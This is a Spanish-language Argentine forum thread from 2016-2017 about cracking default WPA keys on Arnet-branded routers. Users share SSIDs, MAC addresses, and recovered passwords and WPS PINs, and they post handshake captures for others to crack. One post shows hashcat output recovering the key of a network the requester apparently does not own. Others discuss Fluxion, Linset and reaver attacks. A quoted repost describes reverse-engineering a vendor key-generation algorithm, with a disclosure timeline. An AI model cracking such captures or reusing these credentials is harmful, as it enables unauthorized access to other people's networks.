Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 07 de Abril de 2016, 08:51:36 PM
(https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-xtp1/v/t1.0-9/12928286_10207258221268815_7171889695606160347_n.jpg?oh=eea22490b58a4be5a4c5f069eb1b87f8&oe=57B6DACC&__gda__=1471765769_5ed225e74190113e807606d44b250967) (https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-xtp1/v/t1.0-9/12928286_10207258221268815_7171889695606160347_n.jpg?oh=eea22490b58a4be5a4c5f069eb1b87f8&oe=57B6DACC&__gda__=1471765769_5ed225e74190113e807606d44b250967)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 07 de Abril de 2016, 08:53:41 PM
I figured out ....
Estamos hasta el pingo entonces sin algún script que pueda descrifrar el maldito pin de esos modems.:/
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: totial en 08 de Abril de 2016, 11:15:44 AM
Alguno que tenga uno de estos routers nuevos podra leer el firmware para luego analizar la generacion de la clave por defecto? Algunos routers lo hacen al arrancar. De ahi se puede sacar la semilla de generacion que probablemente junto con la mac generan la clave wpa.
saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: JameZ en 21 de Abril de 2016, 03:25:53 PM
Buenas gente. Tengo una pequeña duda con una señal que vengo captando hace unos días atrás.

Me llamó la atención el como termina, es una señal por default.. así que supongo que tendrá una contraseña por default también.

Datos:

Wifi-Arnet-635s
54:dc:96:35:01:b8
WPA2

Datos sacados con Wifi-Analyser para Android.

Como dije arriba, me llamó la atención la letra S al final. Alguno ha trabajado con éste tipo?

Use wifislax con Goyscript WPS, pero nada. Y Gemini Auditor marca una x en color rojo sobre esta misma señal.
Así que supongo que debo usar un diccionario, pero cual será el recomendable?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 26 de Abril de 2016, 02:23:45 PM
You are not allowed to view links. Register or Login
Detalle técnico, los TP-Link tienen el WPS como la WPA, osea todos numero, captura un hand y le paso el dic haber que onda.
De cuántos digitos estaríamos hablando?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 26 de Abril de 2016, 03:13:55 PM
You are not allowed to view links. Register or Login
De cuántos digitos estaríamos hablando?

8 si es igual el WPS a la WPA
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 29 de Abril de 2016, 06:26:22 PM
@D3M0N no tenés más ese TG588 en tu poder?
Que bobina, como no te pedí un dumpeo del firmware. Lo compartíamos por donde sea, con tal que alguien pueda sacar el maldito algoritmo para reventar el pin.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 29 de Abril de 2016, 06:42:32 PM
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login no tenés más ese TG588 en tu poder?

No
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Anubix en 29 de Junio de 2016, 06:08:15 AM
Sumo mi granito de arena. Conseguido con Fluxion

54:DC:96:35:01:B8

WPA

WiFi-Arnet-635s

Contraseña: e3hv78zu7r
Pin: 56004649
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: bolo en 12 de Septiembre de 2016, 12:08:57 AM
Hola,

Por alli alguna alma caritativa, que me pueda ayudar con este router,
si tienen algun diccionario que me puedan sugerir para este AP

WiFi-Arnet-B73n
B4-B3-62-6C-C4-C5

aca les pongo la captura que hize con handshake, WPS desactivado.
coloco la clave que genera pirelli pero naca la pirinaca,

http://www.mediafire.com/download/nb7hsba6rco0hb9/WiFi-Arnet-B73n_%28B4-B3-62-6C-C4-C5%29.cap (http://www.mediafire.com/download/nb7hsba6rco0hb9/WiFi-Arnet-B73n_%28B4-B3-62-6C-C4-C5%29.cap)


Les agradezco de antemano.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Yoshitoshi en 16 de Septiembre de 2016, 04:09:15 PM
Hola que tal, soy de Córdoba (Argentina) y felicito al que creó este sitio.

Capturé este handshake de Arnet. Me podrían dar una mano?

Link:
https://drive.google.com/file/d/0B7k5vsoxDnfoV2JUcHppUDBRNVk/view?usp=sharing
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: michi en 23 de Septiembre de 2016, 08:02:39 PM
Hola!

A mis viejos hace poco les cambiaron el modem Arnet. Les dejo los datos:

Fabricante
Technicolor
Nombre del Producto
MediaAccess TG582n v2
Versión Software
15.38.1619
Versión Firmware
15.38.1619-0709005-20150921124152
Versión Hardware
VANT-U
Número de Serie
CP1547SAC6N
Dirección MAC
C4:EA:1D:B1:56:7C

SSID: WiFi-Arnet-B1567D
Seguridad: WPA2 PSK
Contraseña: 2B074A882F
PIN: 58909065

Si necesitan el firmware díganme cómo lo obtengo y lo comparto.
Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Supehache en 05 de Octubre de 2016, 10:52:31 AM
You are not allowed to view links. Register or Login
Hola,

Por alli alguna alma caritativa, que me pueda ayudar con este router,
si tienen algun diccionario que me puedan sugerir para este AP

WiFi-Arnet-B73n
B4-B3-62-6C-C4-C5

aca les pongo la captura que hize con handshake, WPS desactivado.
coloco la clave que genera pirelli pero naca la pirinaca,

http://www.mediafire.com/download/nb7hsba6rco0hb9/WiFi-Arnet-B73n_%28B4-B3-62-6C-C4-C5%29.cap (http://www.mediafire.com/download/nb7hsba6rco0hb9/WiFi-Arnet-B73n_%28B4-B3-62-6C-C4-C5%29.cap)


Les agradezco de antemano.

Hola, no se como llegué hasta acá pero ya aburrido decidi probar tu cap con un pequeño  diccionario  que tengo que lo hace en 5 minutos y oh sorpresa! saltó la clave!
ojala tuviera yo esa suerte!
Abrazo!

WiFi-Arnet-B73n:b4b3626cc4c5:ec1f727247bd:tibiletti

Session.Name...: hashcat
Status.........: Cracked
Input.Mode.....: File (d:\www\dic\lista.txt)
Hash.Target....: WiFi-Arnet-B73n (b4:b3:62:6c:c4:c5 <-> ec:1f:72:72:47:bd)
Hash.Type......: WPA/WPA2
Time.Started...: Wed Oct 05 10:46:37 2016 (3 mins, 14 secs)
Speed.Dev.#1...:    60537 H/s (12.14ms)
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 13953921/15016242 (92.93%)
Rejected.......: 2162561/13953921 (15.50%)
Restore.Point..: 13875369/15016242 (92.40%)

Started: Wed Oct 04 10:46:37 2016
Stopped: Wed Oct 04 10:49:58 2016


Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diego10 en 05 de Octubre de 2016, 11:06:23 AM
tibiletti en un diccionario?

mas que tibiletti yo diria tibilete
mas que letti puaj que ojete  8)

salio con rima nomas! se va la segunda....

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: bolo en 07 de Octubre de 2016, 03:25:25 PM
You are not allowed to view links. Register or Login
Hola, no se como llegué hasta acá pero ya aburrido decidi probar tu cap con un pequeño  diccionario  que tengo que lo hace en 5 minutos y oh sorpresa! saltó la clave!
ojala tuviera yo esa suerte!
Abrazo!

WiFi-Arnet-B73n:b4b3626cc4c5:ec1f727247bd:tibiletti

Session.Name...: hashcat
Status.........: Cracked
Input.Mode.....: File (d:\www\dic\lista.txt)
Hash.Target....: WiFi-Arnet-B73n (b4:b3:62:6c:c4:c5 <-> ec:1f:72:72:47:bd)
Hash.Type......: WPA/WPA2
Time.Started...: Wed Oct 05 10:46:37 2016 (3 mins, 14 secs)
Speed.Dev.#1...:    60537 H/s (12.14ms)
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 13953921/15016242 (92.93%)
Rejected.......: 2162561/13953921 (15.50%)
Restore.Point..: 13875369/15016242 (92.40%)

Started: Wed Oct 04 10:46:37 2016
Stopped: Wed Oct 04 10:49:58 2016


WOW! Solo te tomo 3 minutos!  Desde ya muchas gracias, tibiletti es la nombre de la calle en donde se ubica el user de la antenita en mención, me hiciste el día brother, te ganaste un pedacito de cielo, jeje.. 
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elhereje en 22 de Noviembre de 2016, 01:13:17 PM
Hola, si a alguien le pinta probar este cap de arnet se los agradecería, tengo buena señal sería un golazo para mi, es el modem nuevo. Gracias.

https://mega.nz/#!FJ5GzLiI!PXQZ5zQAeMytRbLUjkftJFXlnguYx3IkMBhTD-SONnE (https://mega.nz/#!FJ5GzLiI!PXQZ5zQAeMytRbLUjkftJFXlnguYx3IkMBhTD-SONnE)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: slescano en 10 de Diciembre de 2016, 04:42:01 PM
que lo pario tengo el mismo caso de los equipos nuevos de Arnet MediaAccess TG 588v SSID= "WIFI-ARNET-C384E9" MAC=C4:EA:1D:C3:84:E9 que como podemos ver conincide el SSID la parte final con la MAC del equipo. si bien tengo el handshake aun no he podido romperlo, tmb probe de muchas otras maneras sin exito, a alguien se le ocurre que diccionario pueda buscar o como puedo armar uno? la vdd que nose como armar uno y quiero colaborar. Abz
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Blankitolv en 14 de Diciembre de 2016, 09:11:12 PM
Espero que sirva mi pequeño aporte.

Modem: zxhn h168n
Software versión: ZXHN H168N V1.1.00_TA_11
Hardware Versión: 963168vx-Broadcom
Nombre de la red: WiFi-Arnet-wz67
MAC: DC:02:8E:C6:87:DD
Pass: 4938271655

Modem: p-660hnu-t1 v2
software versión: 2.00(AAiJ
Nombre de la red: WiFi-Arnet-w59k
MAC: A0:E4:CB:4F:8A:84
Pass: RYKAJP37MCYEJ

alguien me ayuda con una mac: 44:E9:DD de Arnet?


Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 28 de Diciembre de 2016, 05:43:40 PM
You are not allowed to view links. Register or Login
que lo pario tengo el mismo caso de los equipos nuevos de Arnet MediaAccess TG 588v SSID= "WIFI-ARNET-C384E9" MAC=C4:EA:1D:C3:84:E9 que como podemos ver conincide el SSID la parte final con la MAC del equipo. si bien tengo el handshake aun no he podido romperlo, tmb probe de muchas otras maneras sin exito, a alguien se le ocurre que diccionario pueda buscar o como puedo armar uno? la vdd que nose como armar uno y quiero colaborar. Abz
Yo me di por vencido con éstos modems porque no hay ningún script que vulnere la protección del PIN que trae por default.
Si te animás hacete un diccionario usando nros del 0 al 9 y letras mayúsculas de la A a la F en 10 caracteres. Va a pesar una tonelada, pero la clave por default seguro está ahí.  :P
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: puckJ en 02 de Enero de 2017, 04:57:52 PM
Aporte
Wifi-Arnet-4vbm
dz8he47x37
wps: 74320028
D4:63:FE:E6:AF:34
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Blankitolv en 08 de Enero de 2017, 07:27:16 PM
Disculpen que los moleste, alguien podría ayudarme con una clave?
intenté de todo... fluxion (no resultó), su antecesor linset, reaver pero me bloquea cada 3 pines más de 15 minutos y a veces mucho mucho más... wpspin generator, y ya me quedé sin ideas... sólo me quedaría pasar diccionarios pero pasa que mi pc es MUY absolutamente MUY pobre de hardware. algún alma caritativa :P pasaría este handshake por su diccionario?

https://mega.nz/#!XcskiJiS!FxtgIuMXCqaPwIi7c5-vSfXVM9JPSqtxHvsYrtopBbg

Gracias de antemano. Abrazo
essid: WiFi-Arnet-2C44
bssid: A4:5D:A1:6D:2C:45
WPA2 CCMP PSK
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Supehache en 10 de Enero de 2017, 07:50:05 PM
You are not allowed to view links. Register or Login
Disculpen que los moleste, alguien podría ayudarme con una clave?
intenté de todo... fluxion (no resultó), su antecesor linset, reaver pero me bloquea cada 3 pines más de 15 minutos y a veces mucho mucho más... wpspin generator, y ya me quedé sin ideas... sólo me quedaría pasar diccionarios pero pasa que mi pc es MUY absolutamente MUY pobre de hardware. algún alma caritativa :P pasaría este handshake por su diccionario?

https://mega.nz/#!XcskiJiS!FxtgIuMXCqaPwIi7c5-vSfXVM9JPSqtxHvsYrtopBbg

Gracias de antemano. Abrazo
essid: WiFi-Arnet-2C44
bssid: A4:5D:A1:6D:2C:45
WPA2 CCMP PSK

Hola,

le pasé de 8 dígitos y unos diccionario de palabras y nada che :(





Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Blankitolv en 10 de Enero de 2017, 09:11:48 PM
bueno por lo menos sé que no es nada fácil... seguiré rompiendome la cabeza y buscando muchos pines para no tener que hacer fuerza bruta de 1 pin por hora,
MUCHAS GRACIAS POR INTENTAR MAESTRO!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Blankitolv en 11 de Enero de 2017, 04:24:30 AM
You are not allowed to view links. Register or Login
Hola,

le pasé de 8 dígitos y unos diccionario de palabras y nada che :(
Igual millones de gracias maestro
Título: Info sobre arnet lo que vi en otro foro, PD: Ojo este foro es mejor jajaja :p
Publicado por: Gerardooo903ops en 26 de Enero de 2017, 04:09:14 AM
 Hola, gente. Antes que nada quiero presentarme: Soy nuevo en el foro, como así también en esto de las auditorías wireless.

Hace unos meses, aquí en Argentina, la compañía de internet Arnet ha lanzado un lote de routers wifi que cuentan con un nuevo sistema de contraseñas por defecto (en los anteriores Pirelli la contraseña era simplemente ARNET), y están securizados con WPA-PSK, tipo de radio n.

El SSID se compone de WiFi-Arnet-XXXX
(No estoy seguro de que XXXX sea de longitud fija, pero XXXX es de tipo alfanumérico, y aparentemente las letras son mayúsculas)

La contraseña es de 10 caracteres alfanumericos que combinan mayúsculas, minúsculas y números.

El modelo es ZXHN H108N Fabricado por ZTE Corporation.

¿Alguien tiene una idea más extendida acerca de este patrón?


En línea
willyz9
**
Desconectado Desconectado

Mensajes: 1


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #1 : 21-10-2013, 05:05 (Lunes) »   
Hola amigo, yo estoy en misma situación que vos....
En línea
pantersxx3
**
Desconectado Desconectado

Mensajes: 4


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #2 : 06-12-2014, 06:31 (S?bado) »   
Cool Estoy en la tarea, les cuento... me baje un supuesto firmware del router, lo decompile en linux, me fui a la carpeta webs y alli analilze el codigo fuente del archivo wlsecurity.html y dentro de el hay este fragmento de codgio interensate
Citar
Código:
<!-- hide
var syncNvram = '<%ejGetWl(wlSyncNvram)%>';
var ssidIdx = '<%ejGetWl(wlSsidIdx)%>';
var enblWireless = '<%ejGetWl(wlEnbl_wl0v0)%>';
var radiusServerIP = '<%ejGetWl(wlRadiusServerIP)%>';
var mode = '<%ejGetWl(wlAuthMode)%>';
var bit = '<%ejGetWl(wlKeyBit)%>';
var keyIdx = '<%ejGetWl(wlKeyIndex)%>';
var keys = new Array( "<%ejGetWl(wlKey1)%>", "<%ejGetWl(wlKey2)%>",
                      "<%ejGetWl(wlKey3)%>", "<%ejGetWl(wlKey4)%>" );
var wpaPskKey = '<%ejGetWl(wlWpaPsk)%>';
Buscando sobre que significaba <%ejGetWl( encontre que un codigo enbebido del mismisimo httpd entonces para corroborar esto use ida pro y desensamble el archivo httpd alli encontre el nombre de cada funcion que aparece en este html y en otros.. asi que es por alli donde empezar a buscar el algoritmo que genera las claves por defecto de los router o por lo menos esa es mi teoria... quien se quiera sumar me avisa que necesito ayuda  Grin
En línea
pantersxx3
**
Desconectado Desconectado

Mensajes: 4


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #3 : 10-12-2014, 01:01 (Mi?rcoles) »   
Cheesy encontre la libreria donde estan las funciones que generan la contraseña y en nombre de red... pero para poder verlas hay que desensamblarlo por ende esta en asembler... me esta costando entender el codigo... si alguien ayuda solo queda interpretar el codigo y hacer el programa...
En línea
hugomartin89
**
Desconectado Desconectado

Mensajes: 1


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #4 : 03-01-2015, 05:08 (S?bado) »   
Cita de: pantersxx3 en 10-12-2014, 01:01 (Mi?rcoles)
Cheesy encontre la libreria donde estan las funciones que generan la contraseña y en nombre de red... pero para poder verlas hay que desensamblarlo por ende esta en asembler... me esta costando entender el codigo... si alguien ayuda solo queda interpretar el codigo y hacer el programa...

me interesa, y algo podría aportar...
« Última modificación: 03-01-2015, 05:08 (S?bado) por hugomartin89 »    En línea
pantersxx3
**
Desconectado Desconectado

Mensajes: 4


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #5 : 07-01-2015, 19:30 (Mi?rcoles) »   
Grin disculpa mi demora, ya me echado al abandono, todo esta en una libreria, algo ananlice pero mi assembler es malo, agregame al face www.facebook.com/horacio.fanelli y lo vemos mejor u quien quiera seguir este camino... Angry
En línea
geminis_demon
Colaborador
*
Desconectado Desconectado

Mensajes: 2378


Prácticas precisas precisan práctica


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #6 : 07-01-2015, 21:46 (Mi?rcoles) »   
Ibais por buen camino, el algoritmo estaba en una librería, pero ya se os han adelantado  Grin

http://foro.seguridadwireless.net/desarrollo-112/cve-2015-0558-default-wpa-key-generation-algorithm-for-pirelli-routers/
En línea


La luz cree que viaja más rápido que cualquier otra cosa, pero se equivoca; da lo mismo lo rápido que pueda viajar, porque al final, la luz descubre que la oscuridad ha llegado antes que ella, y la está esperando.
pantersxx3
**
Desconectado Desconectado

Mensajes: 4


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #7 : 08-01-2015, 03:14 (Jueves) »   
Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Angry Angry Angry Angry Angry Angry Angry Angry Angry Angry
En línea
Danonino2003
**
Desconectado Desconectado

Mensajes: 1


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #8 : 08-12-2015, 13:57 (Martes) »   
Buenos dias gente, soy nuevo en el palo la verdad q toco un poco de oido del tema y queria saber si alguien me podia orientar un poco. Estoy intentando chequear la seguridad de un par de redes y me esta resultando imposible y por lo que veo muchos se pusieron contentos por algo que a duras penas entiendo jajaja les paso mi situacion




La cuestion es que no doy pie con bola con esto y eh visto que hay un programa q trabaja con android que me permite ver el numero de pin,alguno lo conoce o me sabe dar algun consejo? Gracias

Cita de: geminis_demon
link=topic=51909.msg324485#msg324485 date=1420663583
Ibais por buen camino, el algoritmo estaba en una librería, pero ya se os han adelantado  Grin

http://foro.seguridadwireless.net/desarrollo-112/cve-2015-0558-default-wpa-key-generation-algorithm-for-pirelli-routers/

y en esta parte es otra pagina del foro donde un chabon uso ingenieria inversa nose que caca es eso y hizo una app que ahora la cobre el muy forro para los routers arnet argentina 2014-2015 creo.

Un par de años si no me acuerdo mal, yo estaba haciendo ingeniería inversa en algunos routers españolas desplegadas por Pirelli también. Después extraje el firmware y descubrí una biblioteca sospechosa con muchas referencias a las funciones de generación de claves. Por desgracia, no pude recuperar el propio algoritmo. Principalmente, porque los routers no estaban usando el mismo algoritmo para la generación de claves por defecto y simplemente porque tal algoritmo no era explícitamente allí. La [El Usuario ha Insultado] sucede! Sin embargo, ya que no podía revelar el algoritmo entonces decidí probar otra manera de recuperar las claves. Con el tiempo, me di cuenta de que estos routers son vulnerables al acceso remoto no autorizado y no autenticado y cualquier adversario podría alcanzar código HTML de nuestra dirección IP pública. Un montón de HTMLs fueron capaces de ser descargados sin ningún tipo de restricción, lo que significa una enorme fuga. Siendo vulnerable a un montón de ataques malignos. Esta divulgación de información a distancia se puede ver en esta CVE-2.015-0554. Por otro lado, no sé si los routers argentinos también son vulnerables a esta vulnerabilidad. No dude en probarlo y que me haga saber también.

Sólo para ver lo fácil que era conseguir esas llaves en la HomeStation (ESSIDs-como WLAN_XXXX) en España, un simple comando curl fue suficiente:

Hoy estoy va a explicar cómo me ingeniería inversa de una biblioteca MIPS con el fin de recuperar la WPA por defecto de generación de claves algoritmo para algunos routers argentinos desplegados por Pirelli. Concretamente el router afectado es el modelo P.DG-A4001N. En primer lugar, no soy ni argentino ni vivo allí. Sin embargo, accidentalmente he observado algunas pegatinas de routers de Pirelli en un foro al azar y como un usuario que ya había publicado públicamente el firmware de los routers luego decidí darle una oportunidad. Como recordaba todavía el archivo en el que se clavaron en los routers españoles, que rápidamente intentó recuperar el algoritmo en estos routers. Siguiente escritura es la forma en que he seguido hasta lograrlo.

Ingeniería inversa del algoritmo de generación de claves por defecto

En esta sección, vamos a aplicar ingeniería inversa a una biblioteca MIPS, /lib/private/libcms.core, que se encuentra en el propio firmware. En primer lugar, vamos a comentar que el firmware se extrajo de otro usuario (fernando3k) y posteriormente se extrae mediante el uso de Binwalk y el firmware-mod-kit. Una vez que se montó en nuestro sistema, nos encontramos con una función llamada GenerateKey. Como se ha visto, los símbolos no se han eliminado en los binarios y nombres de funciones externas siguen ahí porque la compilación dinámica. Esto nos ayudará mucho en nuestra tarea de ingeniería inversa. Además de eso, hemos visto cómo rápidamente esta función se llama a otra que se llama generatekey_from_mac. En este momento, decidí darle una oportunidad a este desafío. Antes de empezar, IDA Pro nos puede ayudar con las referencias cruzadas (referencias externas a partir de IDA Pro) entre las funciones. Vamos a ver cómo se llaman funciones en la biblioteca. (Zoom de imágenes para ver correctamente)
Realmente parece grande! Ahora vamos a ver las referencias cruzadas. Hemos descubierto algunos consejos:
   
Problemas

Desde que intenté hacer una revelación responsable y ni ADB Pirelli ni Arnet Argentina estaban interesados en discutir el problema, por fin he decidido hacer la divulgación completa para acelerar el proceso de fijación. Parece que la única manera con algunos vendedores, simplemente hacerlas cumplir para reemplazar los routers para evitar intrusiones. Muchas cosas pueden suceder si el router SSID con Wifi-Arnet-XXXX tiene la contraseña predeterminada. Para su información, contraseñas por defecto se encuentran en un adhesivo en la parte inferior de los routers. Si usted es propietario de una de estas redes, por favor, cambie su contraseña tan pronto como sea posible. Siempre debe cambiar las contraseñas por defecto, sin embargo.

Un adversario, dentro de la gama de wifi, podría tener acceso a la red y cometer cualquier tipo de fraude. Ser seguro y cambiar las contraseñas en estos momentos!
Línea de tiempo

11.09.2014 encontrado el algoritmo
12/09/2014 Enviar un mensaje a través de Twitter @ArnetOnline @enovella_
09/15/2014 Enviar un mensaje a través de un sitio web, todavía en busca de un simple mail
09/16/2014 Enviar otro mensaje a Arnet a través website.First respuesta a través de twitter donde me redirigen a la forma del web site.
19/09/2014 Enviar un mensaje directo a través de Twitter. Hablo con ellos acerca de la vulnerabilidad crítica y ofrecerles un correo electrónico con la clave PGP
09/20/2014 Más Twitter PM sobre el mismo. Ellos no quieren ser conscientes del problema sin embargo.
23/09/2014 supongo que Arnet no se preocupa por la seguridad de sus clientes en todo lo relativo a su poco interés.
24/09/2014 I enviar el problema al proveedor de ADB Pirelli a través del formulario web
28/09/2014 envío el problema al proveedor de ADB Pirelli través de correo electrónico a Suiza
05/01/2015 La revelación completa
de prueba de concepto

Esta corrección de pruebas de concepto y muchos algoritmos de generación de claves por defecto Pirelli pueden encontrar en mi repositorio Bitbucket. Espero que puedan usarlos. También un copiar y pegar de la primera versión se pueden mirar adelante.

Toda la información   Enojado Enojado
http://ednolo.alumnos.upv.es/?p=1883

Gracias Dudux MuecaEduardo Novella @enovella_


En línea
buckynet
Colaborador
*
DesconectadoDesconectado

Mensajes: 540


Ver Perfil   
   
Re: CVE-2015-0558: default WPA algoritmo de generación de claves para los routers de Pirelli
« Respuesta # 1: 01.06.2015, 00:30 (Martes)»   
Muy guenas a tod @ s !!!

Publicada la versión nueva de la aplicación para Android con el nuevo algoritmo WPAmagickey v1.5.  azn


http://WPAmagickey.blogspot.com
http://Buckynet.blogspot.com

Un saludo.

PD: Como siempre, en Algo, habre metido la pata.
« Modificación de Última: 06/01/2015, doce y treinta y tres (Martes) por buckynet »    En línea
vk496 Desconectado Mensajes: 2102
*******
Desconectado





Ver Perfil  WWW   
   
Re: CVE-2015-0558: default WPA algoritmo de generación de claves para los routers de Pirelli
« Respuesta # 2: 01.06.2015, doce y cuarenta (Martes)»   
Me encanta Como lo Hacen ... Ojala Llegue un ESOs Tener Conocimientos y Habilidades Algún Día

Salu2
En línea
USUARIONUEVO
Colaborador
*
DesconectadoDesconectado

Mensajes: 13125



Ver Perfil   
   
Re: CVE-2015-0558: default WPA algoritmo de generación de claves para los routers de Pirelli
« Respuesta # 3: 01/06/2015, doce y cincuenta y dos (Martes)»   
Código:
git clone https: //dudux@bitbucket.org/dudux/adbpirelli.git


alli encontrareis el fichero en python

Código:
wifiarnet.py


Título: Re:Info sobre arnet lo que vi en otro foro, PD: Ojo este foro es mejor jajaja :p
Publicado por: Gerardooo903ops en 26 de Enero de 2017, 04:14:56 AM
http://foro.seguridadwireless.net/desarrollo-112/cve-2015-0558-default-wpa-key-generation-algorithm-for-pirelli-routers/
Por si alguien quiere la pag, seguro la conocen
Se podra hacer eso de ingenieria inversa para obtener las claves como hizo el tipo este o es un embole?
Título: Re:Info sobre arnet lo que vi en otro foro, PD: Ojo este foro es mejor jajaja :p
Publicado por: albugme en 26 de Enero de 2017, 06:14:48 PM
Yo lo aprendí de este mismo foro (según recuerdo D3M0N publicó una versión compilada de la calculadora de claves), lo malo es que en todas las compañías los routers van cambiando y cada vez quedan menos de esa tanda vulnerable.
Título: Re:Info sobre arnet lo que vi en otro foro, PD: Ojo este foro es mejor jajaja :p
Publicado por: Gerardooo903ops en 26 de Enero de 2017, 07:30:32 PM
Si igual no la pude instalar todabia a wpa magic key en windows 7 o linux vos como hiciste? Estube viendo que saco la app wpa magic key 1.7 que al parecer tiene mas codigos pero la tenes q pagar esta en amazon  :'(
Título: Re:Info sobre arnet lo que vi en otro foro, PD: Ojo este foro es mejor jajaja :p
Publicado por: albugme en 31 de Enero de 2017, 11:23:30 PM
You are not allowed to view links. Register or Login
Si igual no la pude instalar todabia a wpa magic key en windows 7 o linux vos como hiciste? Estube viendo que saco la app wpa magic key 1.7 que al parecer tiene mas codigos pero la tenes q pagar esta en amazon  :'(

Ese no lo probé, el que te digo es este - http://arg-wireless.com.ar/index.php?topic=1006.msg6813#msg6813

Para Windows, también está el "RouterKeygen" que saca los passwords por defecto que usen algoritmos conocidos, para routers de Argentina y otros países, aunque no creo que incluya los de ese programa pago.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: satanas331 en 04 de Febrero de 2017, 03:01:14 PM
Perdon¡¡¡ no supe como subir el archivo¡¡¡


LINSET 0.14 by vk496
   
SSID: WiFi-Arnet-giw9
BSSID: EC:CB:30:35:5B:5B ()
Channel: 1
Security: WPA
Time: 00:41:37
Password: VXNAXHYXEL
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Matii en 10 de Febrero de 2017, 04:51:47 PM
Hola Gente, soy nuevo y después de ver el tremendo trabajo que hacen acá, que déjenme decirles no lo hace casi ningún foro relacionado con el temas de auditoria wifi, me decidí a pedir ayuda con un handshake de arnet que yo estoy empezando a probar diccionario, pero estoy con la netbook del gobierno y hasta conseguirla no voy a parar!! por eso cualquier ayuda pasandole cualquier dic el que quiera darme una manito va a ser bien recibido todo el que quiera apoyar pasandole algun dicc no importa cual sea se lo voy a agradecer muchisimo, asi voy descartando dicc con la netbook del gob, que aunque paresca mala jajaja 198 kb/s jajaja se banco dos redes fibertel tarde 7 dias jaja imaginen mi cara cuando vi que decia key found jajaja, pero bueno es lo que hay  :'( bueno gente todo el que me quiera ayudar pasandole cualquier dicc va a ser recibido,MUCHAS MUCHAS GRACIAS  ;) .
CAP: http://www.mediafire.com/file/0c8g4vg4kkzg6l0/WiFi-Arnet-65E0D1_%28C4-EA-1D-65-E0-D1%29.cap
MAC: C4-EA-1D-65-E0-D1
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: kernel840 en 10 de Febrero de 2017, 06:53:27 PM
You are not allowed to view links. Register or Login
Perdon¡¡¡ no supe como subir el archivo¡¡¡


LINSET 0.14 by vk496
   
SSID: WiFi-Arnet-giw9
BSSID: EC:CB:30:35:5B:5B ()
Channel: 1
Security: WPA
Time: 00:41:37
Password: VXNAXHYXEL

Hola, al linset lo instalaste sobre el ubuntu o usas otra distro para la auditoria (wifislax 4.2, kali, otro), lo virtualizaste por vmware, virtualbox al linux o lo instalaste al disco? (o por ahi un usb? :-\), que adaptador wifi usas para que te funcione bien el linset, modificaste la pagina por defecto para enganchar al SSID, te pregunto esto para mejorar este ataque que segun como lo hagas da mas errores que alegrias y mi objetivo en la vida es ser feliz  :) ;D, gracias
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: oscar_lv65 en 15 de Febrero de 2017, 03:31:21 PM
AYUDENME A SACAR LA CONTRASEÑA A ESTAS CAP PORFAVOR

SSID:HOME-163E
BSSID:C4:27:95:27:16:3E
MANUFACTURER: TECHNICOLOR USA INC.
Model Number:123456
CHAN:1
WPA/WPA2-PSK
https://www.mediafire.com/?6w4tndvfyiwjnds


SSID:Multego 11   
BSSID:A8:D3:F7:70:22:A9
MANUFACTURER: ARCADYAN
CHAN:9
WPA/WPA2-PSK
https://www.mediafire.com/?6w4tndvfyiwjnds
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: nacho4 en 20 de Febrero de 2017, 08:49:50 PM
Buenas tardes, como andan? Primero que todo soy nuevo en el foro, muy bueno de por cierto y mas que es de Argentina, asi nos entendemos mejor en la jerga. Veo que piden ayuda para descifrar claves por fuerza bruta, si me equivoco que alguien me corrija. Tengo 3 redes que comienzan con el nombre del titulo que no las puedo sacar. No tienen WPS activado (Excepto 1) y con fuerza bruta estoy seguro que quemo mi MASTER PC del año 80' mas o menos. Recopile los datos que pude, no soy un experto en la materia y viendo otros temas, creo que junte lo necesario.

Nombre: WiFi-Arnet-56yj
BSSID: 1C:74:0D:1B:3F:B0
Seguridad: WPA2
